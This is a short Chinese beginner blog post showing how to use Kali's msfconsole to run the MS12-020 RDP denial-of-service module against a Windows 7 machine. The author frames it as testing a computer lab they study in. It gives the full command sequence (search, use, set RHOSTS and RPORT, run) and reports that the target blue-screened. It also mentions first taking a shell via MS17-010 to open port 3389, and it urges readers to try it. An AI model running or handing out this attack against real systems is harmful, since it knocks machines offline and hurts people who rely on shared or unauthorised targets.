初学kali之msfconsole攻击框架初识

2022-07-18 14:07:34 浏览数 (1)

前言

这次了解到我们学习的机房可能存在ms12-020漏洞,全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),所以打算测试测试。

工具:kali系统

注意:目标机与本机得互通才行,该漏洞支持win7和win2008,不支持win10,不过大部分机房估计都可以使用,需开启3389端口,我这里是先进行了ms17-010漏洞获取了shell,开启了3389端口,才可以执行的

攻击机kali:192.168.8.39

目标靶机win7:192.168.8.238

这里还存在ms17-010(永恒之蓝)漏洞,利用445端口入侵,获取shell进行提权。这里我就不演示了,相关的可以去百度。

开始攻击

一、首先我们先ping一下目标靶机

二、进入kali系统的msfconsole攻击框架,使用漏洞

代码:

代码语言:javascript复制
1.msfconsole                  #进入msfconsole 框架
2.search ms12-020        #搜索ms12-020漏洞
3.use auxiliary/dos/windows/rdp/ms12_020_maxchannelids           #使用这个漏洞,第二个是检查这个目标是否存在漏洞,我这里就不检查了

三、配置相关目标信息

命令介绍:

代码语言:javascript复制
1.show options          #查看相关参数设置
2.set RHOSTS 192.168.8.238        #设置目标靶机的ip地址
3.set RPORT 3389         #设置目标靶机的ip地址,默认3389

四、执行攻击,查看效果

命令:

代码语言:javascript复制
run          #开始攻击

上图已经是攻击成功了,接下来我们查看效果。

这样就已经成功了,目标靶机应该已经蓝屏死机了,这里已经ping不到了。大家有机会的话可以去试试。

想要了解更多的朋友可以去百度哦~

0 人点赞